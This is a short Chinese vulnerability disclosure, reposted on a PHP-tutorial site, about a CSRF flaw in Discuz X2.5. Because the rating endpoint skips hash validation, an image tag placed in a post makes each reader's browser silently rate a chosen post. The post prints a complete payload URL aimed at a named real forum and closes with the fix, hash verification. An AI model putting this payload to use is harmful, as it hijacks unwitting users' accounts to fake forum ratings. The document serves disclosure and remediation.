网站地图    收藏   

主页 > 后端 > 网站安全 >

DX2.5某处操作未验证HASH,可以CSRF快速刷分 - 网站

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] DX2.5某处操作未验证HASH,可以快速刷分!详细说明:评分处未验证HASH,在个人签名或者回复内容中用插入图片功能插入评分链接,别人打开包含该图片的帖子就会自动给指定帖子加分了...

DX2.5某处操作未验证HASH,可以快速刷分!
详细说明:评分处未验证HASH,在个人签名或者回复内容中用插入图片功能插入评分链接,别人打开包含该图片的帖子就会自动给指定帖子加分了。
 
[img]http://dzs.gamebbs.qq.com/forum.php?mod=misc&action=rate&ratesubmit=yes&infloat=yes&inajax=1formhash=3a0d2122&tid=111664&pid=1819715&referer=http%3A%2F%2Fdzs.gamebbs.qq.com%2Fforum.php%3Fmod%3Dviewthread%26tid%3D111664%26page%3D0%23pid1819715&handlekey=rate&score2=5&reason=%E6%94%AF%E6%8C%81%E5%8E%BB%E6%8E%89TP%EF%BC%81&ratesubmit=true[/img]


http://dzs.gamebbs.qq.com/forum.php?mod=viewthread&tid=111664&page=1#pid1819715
 
 

 
修复方案:

验证HASH 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论